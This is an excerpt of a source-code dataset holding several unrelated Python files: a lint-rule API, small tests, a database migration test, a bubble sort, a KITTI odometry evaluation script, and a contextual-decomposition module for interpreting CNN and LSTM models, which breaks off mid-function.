max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
fixit/common/pseudo_rule.py | sk-/Fixit | 313 | 20919 | <filename>fixit/common/pseudo_rule.py<gh_stars>100-1000
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import abc
import ast
import io
import tokenize
from pathlib import Path
from typing import Iterable, Optional
from fixit.common.report import BaseLintRuleReport
class PseudoContext:
"""
Contains information about the file that `PseudoLintRule.lint_file` should evaluate.
"""
def __init__(
self,
file_path: Path,
source: bytes,
tokens: Optional[Iterable[tokenize.TokenInfo]] = None,
ast_tree: Optional[ast.Module] = None,
) -> None:
self.file_path: Path = file_path
self.source: bytes = source
self._tokens: Optional[Iterable[tokenize.TokenInfo]] = tokens
self._ast_tree: Optional[ast.Module] = ast_tree
@property
def tokens(self) -> Iterable[tokenize.TokenInfo]:
tokens = self._tokens
if tokens is not None:
return tokens
tokens = tuple(tokenize.tokenize(io.BytesIO(self.source).readline))
self._tokens = tokens
return tokens
@property
def ast_tree(self) -> ast.Module:
ast_tree = self._ast_tree
if ast_tree is not None:
return ast_tree
ast_tree = ast.parse(self.source)
self._ast_tree = ast_tree
return ast_tree
class PseudoLintRule(abc.ABC):
"""
Represents a lint rule (or a group of lint rules) that can't be represented by a
normal lint rule. These "pseudo" lint rules receive information about the file from
the `PsuedoContext`.
This API is much more flexible than the normal lint rule API, but that comes at a
(potentially large) performance cost. Because the lint framework does not control
traversal of the syntax tree, it cannot batch the execution of these rules alongside
other lint rules.
This API is used for compatibility with Flake8 rules.
"""
def __init__(self, context: PseudoContext) -> None:
self.context: PseudoContext = context
@abc.abstractmethod
def lint_file(self) -> Iterable[BaseLintRuleReport]:
...
|
homeschool/referrals/tests/test_models.py | chriswedgwood/homeschool | 154 | 20920 | <reponame>chriswedgwood/homeschool<filename>homeschool/referrals/tests/test_models.py
from homeschool.referrals.tests.factories import ReferralFactory
from homeschool.test import TestCase
class TestReferral(TestCase):
def test_factory(self):
referral = ReferralFactory()
assert referral.referring_user is not None
assert referral.created_at is not None
assert referral.status == referral.Status.PENDING
|
tests/storage/psql_dos/migrations/django_branch/test_0043_default_link_label.py | mkrack/aiida-core | 153 | 20951 | # -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
"""Test update of link labels."""
from uuid import uuid4
from aiida.common import timezone
from aiida.storage.psql_dos.migrator import PsqlDostoreMigrator
def test_legacy_jobcalc_attrs(perform_migrations: PsqlDostoreMigrator):
"""Test update of link labels."""
# starting revision
perform_migrations.migrate_up('django@django_0042')
# setup the database
user_model = perform_migrations.get_current_table('db_dbuser')
node_model = perform_migrations.get_current_table('db_dbnode')
link_model = perform_migrations.get_current_table('db_dblink')
with perform_migrations.session() as session:
user = user_model(
email='<EMAIL>',
first_name='John',
last_name='Doe',
institution='EPFL',
)
session.add(user)
session.commit()
node_process = node_model(
uuid=str(uuid4()),
node_type='process.calculation.calcjob.CalcJobNode.',
label='test',
description='',
user_id=user.id,
ctime=timezone.now(),
mtime=timezone.now(),
)
node_data = node_model(
uuid=str(uuid4()),
node_type='data.core.dict.Dict.',
label='test',
description='',
user_id=user.id,
ctime=timezone.now(),
mtime=timezone.now(),
)
session.add(node_process)
session.add(node_data)
session.commit()
link = link_model(
input_id=node_data.id,
output_id=node_process.id,
type='input',
label='_return',
)
session.add(link)
session.commit()
link_id = link.id
# final revision
perform_migrations.migrate_up('django@django_0043')
link_model = perform_migrations.get_current_table('db_dblink')
with perform_migrations.session() as session:
link = session.get(link_model, link_id)
assert link.label == 'result'
|
ds2/sorting/bubblesort.py | aslisabanci/datastructures | 159 | 20959 | def bubblesort(L):
keepgoing = True
while keepgoing:
keepgoing = False
for i in range(len(L)-1):
if L[i]>L[i+1]:
L[i], L[i+1] = L[i+1], L[i]
keepgoing = True
|
src/westpa/core/reweight/__init__.py | burntyellow/adelman_ci | 140 | 20973 | <filename>src/westpa/core/reweight/__init__.py
'''
Function(s) for the postanalysis toolkit
'''
import logging
log = logging.getLogger(__name__)
from . import _reweight
from ._reweight import (stats_process, reweight_for_c)
from .matrix import FluxMatrix
|
eval_odom.py | nikola3794/kitti-odom-eval | 110 | 20987 | # Copyright (C) <NAME> 2019. All rights reserved.
import argparse
from kitti_odometry import KittiEvalOdom
parser = argparse.ArgumentParser(description='KITTI evaluation')
parser.add_argument('--result', type=str, required=True,
help="Result directory")
parser.add_argument('--align', type=str,
choices=['scale', 'scale_7dof', '7dof', '6dof'],
default=None,
help="alignment type")
parser.add_argument('--seqs',
nargs="+",
type=int,
help="sequences to be evaluated",
default=None)
args = parser.parse_args()
eval_tool = KittiEvalOdom()
gt_dir = "dataset/kitti_odom/gt_poses/"
result_dir = args.result
continue_flag = input("Evaluate result in {}? [y/n]".format(result_dir))
if continue_flag == "y":
eval_tool.eval(
gt_dir,
result_dir,
alignment=args.align,
seqs=args.seqs,
)
else:
print("Double check the path!")
|
src/cd.py | laura-rieger/deep-explanation-penalization | 105 | 20989 | <reponame>laura-rieger/deep-explanation-penalization
#original from https://github.com/csinva/hierarchical-dnn-interpretations/blob/master/acd/scores/cd.py
import torch
import torch.nn.functional as F
from copy import deepcopy
from torch import sigmoid
from torch import tanh
import numpy as np
stabilizing_constant = 10e-20
def propagate_three(a, b, c, activation):
a_contrib = 0.5 * (activation(a + c) - activation(c) + activation(a + b + c) - activation(b + c))
b_contrib = 0.5 * (activation(b + c) - activation(c) + activation(a + b + c) - activation(a + c))
return a_contrib, b_contrib, activation(c)
# propagate tanh nonlinearity
def propagate_tanh_two(a, b):
return 0.5 * (tanh(a) + (tanh(a + b) - tanh(b))), 0.5 * (tanh(b) + (tanh(a + b) - tanh(a)))
# propagate convolutional or linear layer
def propagate_conv_linear(relevant, irrelevant, module, device='cuda'):
bias = module(torch.zeros(irrelevant.size()).to(device))
rel = module(relevant) - bias
irrel = module(irrelevant) - bias
# elementwise proportional
prop_rel = torch.abs(rel)
prop_irrel = torch.abs(irrel)
prop_sum = prop_rel + prop_irrel +stabilizing_constant
prop_rel = torch.div(prop_rel, prop_sum)
prop_irrel = torch.div(prop_irrel, prop_sum)
return rel + torch.mul(prop_rel, bias), irrel + torch.mul(prop_irrel, bias)
def propagate_AdaptiveAvgPool2d(relevant, irrelevant, module, device='cuda'):
rel = module(relevant)
irrel = module(irrelevant)
return rel, irrel
# propagate ReLu nonlinearity
def propagate_relu(relevant, irrelevant, activation, device='cuda'):
swap_inplace = False
try: # handles inplace
if activation.inplace:
swap_inplace = True
activation.inplace = False
except:
pass
zeros = torch.zeros(relevant.size()).to(device)
rel_score = activation(relevant)
irrel_score = activation(relevant + irrelevant) - activation(relevant)
if swap_inplace:
activation.inplace = True
return rel_score, irrel_score
# propagate maxpooling operation
def propagate_pooling(relevant, irrelevant, pooler, model_type='mnist'):
if model_type == 'mnist':
unpool = torch.nn.MaxUnpool2d(kernel_size=2, stride=2)
avg_pooler = torch.nn.AvgPool2d(kernel_size=2, stride=2)
window_size = 4
elif model_type == 'vgg':
unpool = torch.nn.MaxUnpool2d(kernel_size=pooler.kernel_size, stride=pooler.stride)
avg_pooler = torch.nn.AvgPool2d(kernel_size=(pooler.kernel_size, pooler.kernel_size),
stride=(pooler.stride, pooler.stride), count_include_pad=False)
window_size = 4
# get both indices
p = deepcopy(pooler)
p.return_indices = True
both, both_ind = p(relevant + irrelevant)
ones_out = torch.ones_like(both)
size1 = relevant.size()
mask_both = unpool(ones_out, both_ind, output_size=size1)
# relevant
rel = mask_both * relevant
rel = avg_pooler(rel) * window_size
# irrelevant
irrel = mask_both * irrelevant
irrel = avg_pooler(irrel) * window_size
return rel, irrel
# propagate dropout operation
def propagate_dropout(relevant, irrelevant, dropout):
return dropout(relevant), dropout(irrelevant)
# get contextual decomposition scores for blob
def cd(blob, im_torch, model, model_type='mnist', device='cuda'):
# set up model
model.eval()
im_torch = im_torch.to(device)
# set up blobs
blob = torch.FloatTensor(blob).to(device)
relevant = blob * im_torch
irrelevant = (1 - blob) * im_torch
if model_type == 'mnist':
scores = []
mods = list(model.modules())[1:]
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[0])
relevant, irrelevant = propagate_pooling(relevant, irrelevant,
lambda x: F.max_pool2d(x, 2, return_indices=True), model_type='mnist')
relevant, irrelevant = propagate_relu(relevant, irrelevant, F.relu)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[1])
relevant, irrelevant = propagate_pooling(relevant, irrelevant,
lambda x: F.max_pool2d(x, 2, return_indices=True), model_type='mnist')
relevant, irrelevant = propagate_relu(relevant, irrelevant, F.relu)
relevant = relevant.view(-1, 800)
irrelevant = irrelevant.view(-1, 800)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[2])
relevant, irrelevant = propagate_relu(relevant, irrelevant, F.relu)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[3])
else:
mods = list(model.modules())
for i, mod in enumerate(mods):
t = str(type(mod))
if 'Conv2d' in t or 'Linear' in t:
if 'Linear' in t:
relevant = relevant.view(relevant.size(0), -1)
irrelevant = irrelevant.view(irrelevant.size(0), -1)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mod)
elif 'ReLU' in t:
relevant, irrelevant = propagate_relu(relevant, irrelevant, mod)
elif 'MaxPool2d' in t:
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mod, model_type=model_type)
elif 'Dropout' in t:
relevant, irrelevant = propagate_dropout(relevant, irrelevant, mod)
return relevant, irrelevant
# batch of [start, stop) with unigrams working
def cd_batch_text(batch, model, start, stop, my_device = 0):
# rework for
weights = model.lstm
# Index one = word vector (i) or hidden state (h), index two = gate
W_ii, W_if, W_ig, W_io = torch.chunk(weights.weight_ih_l0, 4, 0)
W_hi, W_hf, W_hg, W_ho = torch.chunk(weights.weight_hh_l0, 4, 0)
b_i, b_f, b_g, b_o = torch.chunk(weights.bias_ih_l0 + weights.bias_hh_l0, 4)
word_vecs = torch.transpose(model.embed(batch.text).data, 1,2) #change: we take all
T = word_vecs.shape[0]
batch_size = word_vecs.shape[2]
relevant_h = torch.zeros(( model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
irrelevant_h = torch.zeros((model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
prev_rel = torch.zeros(( model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
prev_irrel = torch.zeros(( model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
for i in range(T):
prev_rel_h = relevant_h
prev_irrel_h = irrelevant_h
rel_i = torch.matmul(W_hi, prev_rel_h)
rel_g = torch.matmul(W_hg, prev_rel_h)
rel_f = torch.matmul(W_hf, prev_rel_h)
rel_o = torch.matmul(W_ho, prev_rel_h)
irrel_i = torch.matmul(W_hi, prev_irrel_h)
irrel_g = torch.matmul(W_hg, prev_irrel_h)
irrel_f = torch.matmul(W_hf, prev_irrel_h)
irrel_o = torch.matmul(W_ho, prev_irrel_h)
if i >= start and i <= stop:
rel_i = rel_i +torch.matmul(W_ii, word_vecs[i])
rel_g = rel_g +torch.matmul(W_ig, word_vecs[i])
rel_f = rel_f +torch.matmul(W_if, word_vecs[i])
rel_o = rel_o +torch.matmul(W_io, word_vecs[i])
else:
irrel_i = irrel_i +torch.matmul(W_ii, word_vecs[i])
irrel_g = irrel_g +torch.matmul(W_ig, word_vecs[i])
irrel_f = irrel_f +torch.matmul(W_if, word_vecs[i])
irrel_o = irrel_o +torch.matmul(W_io, word_vecs[i])
rel_contrib_i, irrel_contrib_i, bias_contrib_i = propagate_three(rel_i, irrel_i, b_i[:,None], sigmoid)
rel_contrib_g, irrel_contrib_g, bias_contrib_g = propagate_three(rel_g, irrel_g, b_g[:,None], tanh)
relevant = rel_contrib_i * (rel_contrib_g + bias_contrib_g) + bias_contrib_i * rel_contrib_g
irrelevant = irrel_contrib_i * (rel_contrib_g + irrel_contrib_g + bias_contrib_g) + (rel_contrib_i + bias_contrib_i) * irrel_contrib_g
if i >= start and i < stop:
relevant =relevant + bias_contrib_i * bias_contrib_g
else:
irrelevant =irrelevant + bias_contrib_i * bias_contrib_g
if i > 0:
rel_contrib_f, irrel_contrib_f, bias_contrib_f = propagate_three(rel_f, irrel_f, b_f[:,None], sigmoid)
relevant = relevant +(rel_contrib_f + bias_contrib_f) * prev_rel
irrelevant = irrelevant+(rel_contrib_f + irrel_contrib_f + bias_contrib_f) * prev_irrel + irrel_contrib_f * prev_rel
o = sigmoid(torch.matmul(W_io, word_vecs[i]) + torch.matmul(W_ho, prev_rel_h + prev_irrel_h) + b_o[:,None])
new_rel_h, new_irrel_h = propagate_tanh_two(relevant, irrelevant)
relevant_h = o * new_rel_h
irrelevant_h = o * new_irrel_h
prev_rel = relevant
prev_irrel = irrelevant
W_out = model.hidden_to_label.weight
# Sanity check: scores + irrel_scores should equal the LSTM's output minus model.hidden_to_label.bias
scores = torch.matmul(W_out, relevant_h)
irrel_scores = torch.matmul(W_out, irrelevant_h)
#tolerance = 0.001
#assert torch.sum(torch.abs((model.forward(batch) -model.hidden_to_label.bias.data) - (scores+irrel_scores))).cpu().detach().numpy() < tolerance
return scores, irrel_scores
def cd_text_irreg_scores(batch_text, model, start, stop, my_device = 0):
weights = model.lstm
# Index one = word vector (i) or hidden state (h), index two = gate
W_ii, W_if, W_ig, W_io = torch.chunk(weights.weight_ih_l0, 4, 0)
W_hi, W_hf, W_hg, W_ho = torch.chunk(weights.weight_hh_l0, 4, 0)
b_i, b_f, b_g, b_o = torch.chunk(weights.bias_ih_l0 + weights.bias_hh_l0, 4)
word_vecs = torch.transpose(model.embed(batch_text).data, 1,2) #change: we take all
T = word_vecs.shape[0]
batch_size = word_vecs.shape[2]
relevant_h = torch.zeros(( model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
irrelevant_h = torch.zeros((model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
prev_rel = torch.zeros(( model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
prev_irrel = torch.zeros(( model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
for i in range(T):
prev_rel_h = relevant_h
prev_irrel_h = irrelevant_h
rel_i = torch.matmul(W_hi, prev_rel_h)
rel_g = torch.matmul(W_hg, prev_rel_h)
rel_f = torch.matmul(W_hf, prev_rel_h)
rel_o = torch.matmul(W_ho, prev_rel_h)
irrel_i = torch.matmul(W_hi, prev_irrel_h)
irrel_g = torch.matmul(W_hg, prev_irrel_h)
irrel_f = torch.matmul(W_hf, prev_irrel_h)
irrel_o = torch.matmul(W_ho, prev_irrel_h)
w_ii_contrib = torch.matmul(W_ii, word_vecs[i])
w_ig_contrib = torch.matmul(W_ig, word_vecs[i])
w_if_contrib = torch.matmul(W_if, word_vecs[i])
w_io_contrib = torch.matmul(W_io, word_vecs[i])
is_in_relevant = ((start <= i) * (i <= stop)).cuda().float()
is_not_in_relevant = 1 - is_in_relevant
rel_i = rel_i + is_in_relevant * w_ii_contrib
rel_g = rel_g + is_in_relevant * w_ig_contrib
rel_f = rel_f + is_in_relevant * w_if_contrib
rel_o = rel_o + is_in_relevant * w_io_contrib
irrel_i = irrel_i + is_not_in_relevant * w_ii_contrib
irrel_g = irrel_g + is_not_in_relevant * w_ig_contrib
irrel_f = irrel_f + is_not_in_relevant * w_if_contrib
irrel_o = irrel_o + is_not_in_relevant * w_io_contrib
rel_contrib_i, irrel_contrib_i, bias_contrib_i = propagate_three(rel_i, irrel_i, b_i[:,None], sigmoid)
rel_contrib_g, irrel_contrib_g, bias_contrib_g = propagate_three(rel_g, irrel_g, b_g[:,None], tanh)
relevant = rel_contrib_i * (rel_contrib_g + bias_contrib_g) + bias_contrib_i * rel_contrib_g
irrelevant = irrel_contrib_i * (rel_contrib_g + irrel_contrib_g + bias_contrib_g) + (rel_contrib_i + bias_contrib_i) * irrel_contrib_g
bias_contrib =bias_contrib_i * bias_contrib_g
is_in_relevant_bias = ((start <= i) * (i < stop)).cuda().float()
is_not_in_relevant_bias = 1- is_in_relevant_bias
relevant =relevant + is_in_relevant_bias*bias_contrib
irrelevant =irrelevant + is_not_in_relevant_bias*bias_contrib
if i > 0:
rel_contrib_f, irrel_contrib_f, bias_contrib_f = propagate_three(rel_f, irrel_f, b_f[:,None], sigmoid)
relevant = relevant +(rel_contrib_f + bias_contrib_f) * prev_rel
irrelevant = irrelevant+(rel_contrib_f + irrel_contrib_f + bias_contrib_f) * prev_irrel + irrel_contrib_f * prev_rel
o = sigmoid(torch.matmul(W_io, word_vecs[i]) + torch.matmul(W_ho, prev_rel_h + prev_irrel_h) + b_o[:,None])
new_rel_h, new_irrel_h = propagate_tanh_two(relevant, irrelevant)
relevant_h = o * new_rel_h
irrelevant_h = o * new_irrel_h
prev_rel = relevant
prev_irrel = irrelevant
W_out = model.hidden_to_label.weight
# Sanity check: scores + irrel_scores should equal the LSTM's output minus model.hidden_to_label.bias
scores = torch.matmul(W_out, relevant_h)
irrel_scores = torch.matmul(W_out, irrelevant_h)
return scores, irrel_scores
def cd_text(batch, model, start, stop, batch_id = 0,my_device = 0):
# rework for
weights = model.lstm.state_dict()
# Index one = word vector (i) or hidden state (h), index two = gate
W_ii, W_if, W_ig, W_io = torch.chunk(weights['weight_ih_l0'], 4, 0)
W_hi, W_hf, W_hg, W_ho = torch.chunk(weights['weight_hh_l0'], 4, 0)
b_i, b_f, b_g, b_o = torch.chunk(weights['bias_ih_l0'] + weights['bias_hh_l0'], 4)
word_vecs = model.embed(batch.text)[:, batch_id].data
T = word_vecs.shape[0]
relevant = torch.zeros((T, model.hidden_dim), device =torch.device(my_device))
irrelevant = torch.zeros((T, model.hidden_dim), device =torch.device(my_device))
relevant_h = torch.zeros((T, model.hidden_dim), device =torch.device(my_device))
irrelevant_h = torch.zeros((T, model.hidden_dim), device =torch.device(my_device))
for i in range(T):
if i > 0:
prev_rel_h = relevant_h[i - 1]
prev_irrel_h = irrelevant_h[i - 1]
else:
prev_rel_h = torch.zeros(model.hidden_dim, device =torch.device(my_device))
prev_irrel_h = torch.zeros(model.hidden_dim, device =torch.device(my_device))
rel_i = torch.matmul(W_hi, prev_rel_h)
rel_g = torch.matmul(W_hg, prev_rel_h)
rel_f = torch.matmul(W_hf, prev_rel_h)
rel_o = torch.matmul(W_ho, prev_rel_h)
irrel_i = torch.matmul(W_hi, prev_irrel_h)
irrel_g = torch.matmul(W_hg, prev_irrel_h)
irrel_f = torch.matmul(W_hf, prev_irrel_h)
irrel_o = torch.matmul(W_ho, prev_irrel_h)
if start <= i <= stop:
rel_i = rel_i + torch.matmul(W_ii, word_vecs[i])
rel_g = rel_g + torch.matmul(W_ig, word_vecs[i])
rel_f = rel_f + torch.matmul(W_if, word_vecs[i])
rel_o = rel_o + torch.matmul(W_io, word_vecs[i])
else:
irrel_i = irrel_i + torch.matmul(W_ii, word_vecs[i])
irrel_g = irrel_g + torch.matmul(W_ig, word_vecs[i])
irrel_f = irrel_f + torch.matmul(W_if, word_vecs[i])
irrel_o = irrel_o + torch.matmul(W_io, word_vecs[i])
rel_contrib_i, irrel_contrib_i, bias_contrib_i = propagate_three(rel_i, irrel_i, b_i, sigmoid)
rel_contrib_g, irrel_contrib_g, bias_contrib_g = propagate_three(rel_g, irrel_g, b_g, tanh)
relevant[i] = rel_contrib_i * (rel_contrib_g + bias_contrib_g) + bias_contrib_i * rel_contrib_g
irrelevant[i] = irrel_contrib_i * (rel_contrib_g + irrel_contrib_g + bias_contrib_g) + (
rel_contrib_i + bias_contrib_i) * irrel_contrib_g
if start <= i <= stop:
relevant[i] += bias_contrib_i * bias_contrib_g
else:
irrelevant[i] += bias_contrib_i * bias_contrib_g
if i > 0:
rel_contrib_f, irrel_contrib_f, bias_contrib_f = propagate_three(rel_f, irrel_f, b_f, sigmoid)
relevant[i] += (rel_contrib_f + bias_contrib_f) * relevant[i - 1]
irrelevant[i] += (rel_contrib_f + irrel_contrib_f + bias_contrib_f) * irrelevant[i - 1] + irrel_contrib_f * \
relevant[i - 1]
o = sigmoid(torch.matmul(W_io, word_vecs[i]) + torch.matmul(W_ho, prev_rel_h + prev_irrel_h) + b_o)
#rel_contrib_o, irrel_contrib_o, bias_contrib_o = propagate_three(rel_o, irrel_o, b_o, sigmoid)
new_rel_h, new_irrel_h = propagate_tanh_two(relevant[i], irrelevant[i])
relevant_h[i] = o * new_rel_h
irrelevant_h[i] = o * new_irrel_h
W_out = model.hidden_to_label.weight.data
# Sanity check: scores + irrel_scores should equal the LSTM's output minus model.hidden_to_label.bias
scores = torch.matmul(W_out, relevant_h[T - 1])
irrel_scores = torch.matmul(W_out, irrelevant_h[T - 1])
tolerance = 0.001
assert torch.sum(torch.abs((model.forward(batch) -model.hidden_to_label.bias.data) - (scores+irrel_scores))).cpu().detach().numpy() < tolerance
return scores
def softmax_out(output):
return torch.nn.functional.softmax(torch.stack((output[0].reshape(-1),output[1].reshape(-1)), 1), dim = 1)
def is_in_relevant_toy(batch, start, stop, class_rules):
#XXX only for current model where relevant bigger five
rel_digits = ((batch.label ==0)[None, :] *(batch.text ==class_rules[0])) + (batch.label ==1)[None, :] *(batch.text ==class_rules[1])
relevant = rel_digits[start:stop].sum(dim=0)
irrelevant = rel_digits.sum(dim=0) - relevant
test_out = torch.cat((relevant[:, None], irrelevant[:, None]), 1)
return test_out
def cd_penalty_for_one_toy(batch, model1, start, stop,class_rules):
# get output
model1_output = cd_batch_text(batch, model1, start, stop)
# only use the correct class
correct_idx = (batch.label, torch.arange(batch.label.shape[0]))
model1_softmax = softmax_out((model1_output[0][correct_idx],model1_output[1][correct_idx]))
model2_softmax = is_in_relevant_toy(batch, start, stop,class_rules).cuda().float()
output = -(torch.log(model1_softmax)*model2_softmax).mean()
return output
def is_in_relevant_decoy(batch, start, stop, class_rules):
is_decoy = ((batch.label ==0) *(batch.text[start:stop] ==class_rules[0]) + (batch.label ==1) *(batch.text[start:stop] ==class_rules[1]))
return is_decoy.sum(dim=0)
def cd_penalty_for_one_decoy(batch, model1, start, stop,class_rules):
model1_output = cd_batch_text(batch, model1, start, stop)
correct_idx = (batch.label, torch.arange(batch.label.shape[0])) # only use the correct class
model1_softmax = softmax_out((model1_output[0][correct_idx],model1_output[1][correct_idx]))
mask_decoy_in_relevant = is_in_relevant_decoy(batch, start, stop,class_rules).cuda()
if mask_decoy_in_relevant.byte().any():
masked_relevant = model1_softmax[:,1].masked_select(mask_decoy_in_relevant.byte())
output = -(torch.log(masked_relevant)).mean()
return output
else:
return torch.zeros(1).cuda()
def cd_penalty_annotated(batch, model1, start, stop, scores):
# get index where annotation present:
idx_nonzero = (start != -1).nonzero()[:,0] # find the ones where annotation exists
model_output = cd_text_irreg_scores(batch.text[:, idx_nonzero], model1, start[ idx_nonzero], stop[idx_nonzero])[0] #get the output and focus on relevant scores for class 0 vs 1
model_softmax = torch.nn.functional.softmax(model_output, dim =0)[batch.label[idx_nonzero],np.arange(len(idx_nonzero))] #take softmax of class 0 vs 1 and take the correct digit
output = -(torch.log(model_softmax)*scores[ idx_nonzero].float()).mean() #-(torch.log(1-model_softmax)*(1- scores[ idx_nonzero]).float() ).mean() #if it agrees, maximize - if it dis, min
return output
# def cd_penalty_annotated(batch, model1, start, stop, scores):
# # get index where annotation present:
# idx_nonzero = (start != -1).nonzero()[:,0]
# model_output = cd_text_irreg_scores(batch.text[:, idx_nonzero], model1, start[ idx_nonzero], stop[idx_nonzero])[0]
# correct_idx = (batch.label[ idx_nonzero], torch.arange(batch.label[ idx_nonzero].shape[0]) )
# model_softmax = torch.nn.functional.softmax(model_output, dim =0)[correct_idx]
# output = -(torch.log(model_softmax)*scores[ idx_nonzero].float()).mean() -(torch.log(model_softmax)*(1- scores[ idx_nonzero]).float() ).mean() #next thing to try
# print(output, torch.log(model_softmax).mean())
# return output
# def cd_penalty_annotated(batch, model1, start, stop, agrees):
# model1_output = cd_text_irreg_scores(batch.text, model1, start, stop)
# correct_idx = (batch.label, torch.arange(batch.label.shape[0])) # only use the correct class
# model1_softmax = softmax_out((model1_output[0][0],model1_output[0][1]))[correct_idx]
# output = -(torch.log(model1_softmax) * agrees.float()).mean() #+ (torch.log(model1_softmax) * (1-agrees).float()).mean()
# return output
def cd_penalty_for_one_decoy_all(batch, model1, start, stop):
mask_exists =(start!=-1).byte().cuda()
if mask_exists.any():
model1_output = cd_text_irreg_scores(batch.text, model1, start, stop)
correct_idx = (batch.label, torch.arange(batch.label.shape[0])) # only use the correct class
wrong_idx = (1-batch.label, torch.arange(batch.label.shape[0]))
model1_softmax = softmax_out((model1_output[0][correct_idx],model1_output[1][correct_idx])) #+ softmax_out((model1_output[0][wrong_idx],model1_output[1][wrong_idx]))
output = (torch.log(model1_softmax[:,1])).masked_select(mask_exists)
return -output.mean()
else:
return torch.zeros(1).cuda()
def cd_penalty(batch, model1, model2, start, stop):
model1_output = cd_batch_text(batch, model1, start, stop)
model2_output = cd_batch_text(batch, model2, start, stop)
model1_softmax = softmax_out(model1_output)
model2_softmax = softmax_out(model2_output)
return ((model1_softmax-model2_softmax)*(torch.log(model1_softmax) - torch.log(model2_softmax))).sum(dim=1).reshape((2,-1)).sum(dim=0)
# this implementation of cd is very long so that we can view CD at intermediate layers
# in reality, this should be a loop which uses the above functions
def cd_vgg_features(blob,im_torch, model, model_type='vgg'):
# set up model
model.eval()
# set up blobs
blob = torch.cuda.FloatTensor(blob)
relevant = blob * im_torch
irrelevant = (1 - blob) * im_torch
mods = list(model.modules())[2:]
# (0): Conv2d (3, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (1): ReLU(inplace)
# (2): Conv2d (64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (3): ReLU(inplace)
# (4): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[0])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[1])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[2])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[3])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[4], model_type=model_type)
# (5): Conv2d (64, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (6): ReLU(inplace)
# (7): Conv2d (128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (8): ReLU(inplace)
# (9): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[5])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[6])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[7])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[8])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[9], model_type=model_type)
# (10): Conv2d (128, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (11): ReLU(inplace)
# (12): Conv2d (256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (13): ReLU(inplace)
# (14): Conv2d (256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (15): ReLU(inplace)
# (16): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[10])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[11])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[12])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[13])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[14])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[15])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[16], model_type=model_type)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[17])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[18])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[19])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[20])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[21])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[22])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[23], model_type=model_type)
# scores.append((relevant.clone(), irrelevant.clone()))
# (24): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (25): ReLU(inplace)
# (26): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (27): ReLU(inplace)
# (28): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (29): ReLU(inplace)
# (30): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[24])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[25])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[26])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[27])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[28])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[29])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[30], model_type=model_type)
